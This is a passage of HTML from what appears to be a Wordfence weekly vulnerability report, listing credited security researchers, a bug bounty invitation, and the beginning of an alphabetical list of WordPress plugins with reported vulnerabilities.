					<img decoding="async" src="https://www.gravatar.com/avatar/dfb3a6a61ca4c3b3c0b1dc68fdb21953.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dfb3a6a61ca4c3b3c0b1dc68fdb21953"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/drew-webber" target="_blank" rel="noopener">Drew Webber (mcdruid)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1fcd4731afa8285a12c991cc8c7bdb09.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1fcd4731afa8285a12c991cc8c7bdb09"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/taylsec" target="_blank" rel="noopener">Taylsec</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/05990c2d2635cef18ddf1e675469a91b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="05990c2d2635cef18ddf1e675469a91b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/louis-deschanel" target="_blank" rel="noopener">Louis Deschanel (JeanJeanLeHaxor)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3fa2c8b95407509d805e36f901ce7bdf.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3fa2c8b95407509d805e36f901ce7bdf"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pascal-sun" target="_blank" rel="noopener">Pascal SUN</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/15c7bc3e71963fdd7c656346bcf8b159.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="15c7bc3e71963fdd7c656346bcf8b159"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phuc-truong-huu" target="_blank" rel="noopener">Trương Hữu Phúc (truonghuuphuc)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/51ac16594069727fd09950dd36cda805.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="51ac16594069727fd09950dd36cda805"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/talal-nasraddeen" target="_blank" rel="noopener">Talal Nasraddeen</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6deed0b6697b2b816e73139757aead6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6deed0b6697b2b816e73139757aead6b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alexander-jurkschat" target="_blank" rel="noopener">Alexander Jurkschat</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d4ffc641ce84aa2161a00a010cfc1d18.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d4ffc641ce84aa2161a00a010cfc1d18"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sanjar-tulkinov" target="_blank" rel="noopener">Sanjar Tulkinov</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2cd055dd6c3bc3b1292e85a8a8a0cfd9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2cd055dd6c3bc3b1292e85a8a8a0cfd9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duy-khanh" target="_blank" rel="noopener">Duy Tran</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c10dbe06f111ce709fdc2628e94ac9a1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c10dbe06f111ce709fdc2628e94ac9a1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mitchell" target="_blank" rel="noopener">Mitchell</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b1d1a52889f8e60eb6bb4c2b632399a5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b1d1a52889f8e60eb6bb4c2b632399a5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/diogo-pinto" target="_blank" rel="noopener">Diogo Pinto</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/0762f07d2d241bc80d9a4817b0625b83.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0762f07d2d241bc80d9a4817b0625b83"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zhuxuan-wu" target="_blank" rel="noopener">zhuxuan wu</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/340785ad53a1d99fd1554ac3f88bf112.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="340785ad53a1d99fd1554ac3f88bf112"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/makka-pakka" target="_blank" rel="noopener">she11f</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ba04da1dd94296eb4136b3e7bd671e6c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ba04da1dd94296eb4136b3e7bd671e6c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vantastic" target="_blank" rel="noopener">VanTastic</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d8e6822edce0e2861e1ce160f4975e34.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d8e6822edce0e2861e1ce160f4975e34"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yongtae-jeon" target="_blank" rel="noopener">Win3</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yousof-nahya" target="_blank" rel="noopener">Yousof Nahya</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hamza-nour" target="_blank" rel="noopener">Hamza Nour</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/221461b70f6b0e2c571141647c2528f4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="221461b70f6b0e2c571141647c2528f4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yousof-nahya-2" target="_blank" rel="noopener">Yousof Nahya (whoami03)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/0203e07dd2cfa312f294f9391bdec1e8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0203e07dd2cfa312f294f9391bdec1e8"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/levinitycyber" target="_blank" rel="noopener">LevinityCyber</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/890bcfbaf2c84c9c872bf1c027848673.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="890bcfbaf2c84c9c872bf1c027848673"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/afan" target="_blank" rel="noopener">Afan</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3134259fccb2cd11ac78ae74096b9b91.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3134259fccb2cd11ac78ae74096b9b91"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/moonge" target="_blank" rel="noopener">moonge</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/78db0fddf357f7207a5574afee653e7d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="78db0fddf357f7207a5574afee653e7d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/septio-noerdiansyah" target="_blank" rel="noopener">Septio Noerdiansyah</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2440c0aacc02af8dcc176fda663ee4a8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2440c0aacc02af8dcc176fda663ee4a8"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-truong" target="_blank" rel="noopener">Nguyen Quang Truong</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/68bf83ddc4a547f6935e2ad92922ee09.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="68bf83ddc4a547f6935e2ad92922ee09"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mai-chu-thao" target="_blank" rel="noopener">Chu Thao Mai</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/krugov-artyom" target="_blank" rel="noopener">Krugov Artyom</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d492fb633dd568a0e582376bd84f7406.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d492fb633dd568a0e582376bd84f7406"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/manuel-martinez-casasola" target="_blank" rel="noopener">Manuel Martínez Casasola</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3bbe3fab00912827f35b45e537ae8af7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bbe3fab00912827f35b45e537ae8af7"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bhayanak-atma" target="_blank" rel="noopener">Hardik Patel</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4ecc8b71d0984f421844d12e862a7638.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ecc8b71d0984f421844d12e862a7638"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener">Austin Ginder</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/495f7dc5e65ef9d4606321be8446eb13.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="495f7dc5e65ef9d4606321be8446eb13"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lukasz-sobanski" target="_blank" rel="noopener">lucsob</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bonds" target="_blank" rel="noopener">Bonds</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5a88f0d2ed56d288f5ba6f81e521fe8b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5a88f0d2ed56d288f5ba6f81e521fe8b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kevin" target="_blank" rel="noopener">Kevin</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9c1637c1901bf472307fb82f9ffe38a3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9c1637c1901bf472307fb82f9ffe38a3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daniel-pua-devploit" target="_blank" rel="noopener">Daniel Púa &#8211; devploit</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ae8de8c9cbdc17ec01dd57c487e7cd37.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ae8de8c9cbdc17ec01dd57c487e7cd37"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/qdtad" target="_blank" rel="noopener">qdtad</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/33751fc657c409bebde901e7bad75981.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="33751fc657c409bebde901e7bad75981"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duc-anh-chu" target="_blank" rel="noopener">anhcd05</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
</table>
<p><em>Are you a security researcher who would like to be featured in our weekly vulnerability report?</em> You can responsibly disclose your WordPress vulnerability discoveries to us and earn a bounty on in-scope vulnerabilities <a href="https://www.wordfence.com/threat-intel/vulnerabilities/submit/" target="_blank" rel="noopener">through our Bug Bounty Program</a>. Responsibly disclosing your vulnerability discoveries to us will also get your name added on the <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/" target="_blank" rel="noopener">Wordfence Intelligence leaderboard</a> along with being mentioned in our weekly vulnerability report.</p>
<hr>
<h3>WordPress Plugins with Reported Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table software-list">
<tr>
<th class="text-center w-50">Software Name</th>
<th class="text-center">Software Slug</th>
</tr>
<tr>
<td>Ad Invalid Click Protector (AICP)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ad-invalid-click-protector" target="_blank" rel="noopener">ad-invalid-click-protector</a>
		</td>
</tr>
<tr>
<td>Admin and Site Enhancements (ASE) Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/admin-site-enhancements-pro" target="_blank" rel="noopener">admin-site-enhancements-pro</a>
		</td>
</tr>
<tr>
<td>Admin Columns for ACF Fields</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/admin-columns-for-acf-fields" target="_blank" rel="noopener">admin-columns-for-acf-fields</a>
		</td>
</tr>
<tr>
<td>Advanced Form Integration — Connect Forms to 200+ Apps</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-form-integration" target="_blank" rel="noopener">advanced-form-integration</a>
		</td>
</tr>
<tr>
<td>Advanced Responsive Video Embedder for Rumble, Odysee, YouTube, Vimeo, Kick …</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-responsive-video-embedder" target="_blank" rel="noopener">advanced-responsive-video-embedder</a>
		</td>
</tr>
<tr>
<td>Advanced Shipment Tracking for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-advanced-shipment-tracking" target="_blank" rel="noopener">woo-advanced-shipment-tracking</a>
		</td>
</tr>
<tr>
<td>Advanced Views – Display Custom Fields (ACF, Pods, MetaBox), Posts, CPT and Woo Products anywhere in Gutenberg, Elementor, Divi, Beaver…</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-views" target="_blank" rel="noopener">acf-views</a>
		</td>
</tr>
<tr>
<td>Advanced Woo Labels – Product Labels &amp; Badges for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-woo-labels" target="_blank" rel="noopener">advanced-woo-labels</a>
		</td>
</tr>
<tr>
<td>AffiliateWP</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/affiliate-wp" target="_blank" rel="noopener">affiliate-wp</a>
		</td>
</tr>
<tr>
<td>AI Copilot – Content Generator</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-copilot-content-generator" target="_blank" rel="noopener">ai-copilot-content-generator</a>
		</td>
</tr>
<tr>
<td>AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-engine" target="_blank" rel="noopener">ai-engine</a>
		</td>
</tr>
<tr>
<td>Animation Addons for Elementor – GSAP Motion Elementor Addons &amp; Website Templates</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/animation-addons-for-elementor" target="_blank" rel="noopener">animation-addons-for-elementor</a>
		</td>
</tr>
<tr>
<td>AnsPress – Question and answer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/anspress-question-answer" target="_blank" rel="noopener">anspress-question-answer</a>
		</td>
</tr>
<tr>
<td>Anti Spam and list cleaner – AcyChecker</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acychecker" target="_blank" rel="noopener">acychecker</a>
		</td>
</tr>
<tr>
<td>Auto Featured Image (Auto Post Thumbnail)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/auto-post-thumbnail" target="_blank" rel="noopener">auto-post-thumbnail</a>
		</td>
</tr>
<tr>
<td>BackWPup – WordPress Backup &amp; Restore Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup" target="_blank" rel="noopener">backwpup</a>
		</td>
</tr>
<tr>
<td>Better Messages – Chat Rooms, Group Chat, Private Messages &amp; AI Chat Bots</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bp-better-messages" target="_blank" rel="noopener">bp-better-messages</a>
		</td>
</tr>
<tr>
<td>Bit Form – Contact Form, Payment Forms, Multi Step Forms, Calculator &amp; Custom Form Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bit-form" target="_blank" rel="noopener">bit-form</a>
		</td>
</tr>
<tr>
<td>Bit integrations – Form Integration, Webhook, Spreadsheets, CRM, LMS &amp; Email Automation</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bit-integrations" target="_blank" rel="noopener">bit-integrations</a>
		</td>
</tr>
<tr>
<td>Booking Calendar</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking" target="_blank" rel="noopener">booking</a>
		</td>
</tr>
<tr>
<td>Booking for Appointments and Events Calendar – Amelia</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ameliabooking" target="_blank" rel="noopener">ameliabooking</a>
		</td>
</tr>
<tr>
<td>Booking System Trafft</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking-system-trafft" target="_blank" rel="noopener">booking-system-trafft</a>
		</td>
</tr>
<tr>
<td>BOX NOW Delivery Croatia + Slovenia</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/box-now-delivery-croatia" target="_blank" rel="noopener">box-now-delivery-croatia</a>
		</td>
</tr>
<tr>
<td>Breakdance</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/breakdance" target="_blank" rel="noopener">breakdance</a>
		</td>
</tr>
<tr>
<td>Brizy – Page Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/brizy" target="_blank" rel="noopener">brizy</a>
		</td>
</tr>
<tr>
<td>BuddyPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/buddypress" target="_blank" rel="noopener">buddypress</a>
		</td>
</tr>
<tr>
<td>Business Directory Plugin – Easy Listing Directories for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/business-directory-plugin" target="_blank" rel="noopener">business-directory-plugin</a>
		</td>
</tr>
<tr>
<td>Charitable – Donation &amp; Fundraising Platform (Donation Forms, Recurring Donations &amp; Fundraising Campaigns)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/charitable" target="_blank" rel="noopener">charitable</a>
		</td>
</tr>
<tr>
<td>Chaty Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chaty-pro" target="_blank" rel="noopener">chaty-pro</a>
		</td>
</tr>
<tr>
<td>Checkout Field Editor for WooCommerce – Checkout Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/checkout-field-editor-and-manager-for-woocommerce" target="_blank" rel="noopener">checkout-field-editor-and-manager-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Clever Mega Menu for Visual Composer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/clever-mega-menu" target="_blank" rel="noopener">clever-mega-menu</a>
		</td>
</tr>
<tr>
<td>Codeless Page Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/codeless-page-builder" target="_blank" rel="noopener">codeless-page-builder</a>
		</td>
</tr>
<tr>
<td>Colissimo shipping methods for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/colissimo-shipping-methods-for-woocommerce" target="_blank" rel="noopener">colissimo-shipping-methods-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Contact Form to Any API</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contact-form-to-any-api" target="_blank" rel="noopener">contact-form-to-any-api</a>
		</td>
</tr>
<tr>
<td>Contest Gallery – Upload &amp; Vote Photos, Media, Sell with PayPal &amp; Stripe</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contest-gallery" target="_blank" rel="noopener">contest-gallery</a>
		</td>
</tr>
<tr>
<td>Cost Calculator Builder PRO</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cost-calculator-builder-pro" target="_blank" rel="noopener">cost-calculator-builder-pro</a>
		</td>
</tr>
<tr>
<td>Cozy Blocks – Page Builder for Gutenberg Editor &amp; FSE with 700+ Patterns, 58 Blocks &amp; Templates</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cozy-addons" target="_blank" rel="noopener">cozy-addons</a>
		</td>
</tr>
<tr>
<td>Creative Mail – Easier WordPress &amp; WooCommerce Email Marketing</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/creative-mail-by-constant-contact" target="_blank" rel="noopener">creative-mail-by-constant-contact</a>
		</td>
</tr>
<tr>
<td>CubeWP Framework</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cubewp-framework" target="_blank" rel="noopener">cubewp-framework</a>
		</td>
</tr>
<tr>
<td>Database Collation Fix</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/database-collation-fix" target="_blank" rel="noopener">database-collation-fix</a>
		</td>
</tr>
<tr>
<td>Database for CF7</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/database-for-cf7" target="_blank" rel="noopener">database-for-cf7</a>
		</td>
</tr>
<tr>
<td>Demi – One Click Demo Import, Backup &amp; Site Migration</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/demi-backup-migration" target="_blank" rel="noopener">demi-backup-migration</a>
		</td>
</tr>
<tr>
<td>Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dokan-lite" target="_blank" rel="noopener">dokan-lite</a>
		</td>
</tr>
<tr>
<td>Download Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/download-manager" target="_blank" rel="noopener">download-manager</a>
		</td>
</tr>
<tr>
<td>Easy Appointments</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">easy-appointments</a>
		</td>
</tr>
<tr>
<td>Easy Digital Downloads – eCommerce Payments and Subscriptions made easy</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-digital-downloads" target="_blank" rel="noopener">easy-digital-downloads</a>
		</td>
</tr>
<tr>
<td>Easy PayPal &amp; Stripe Buy Now Button</td>
<td>
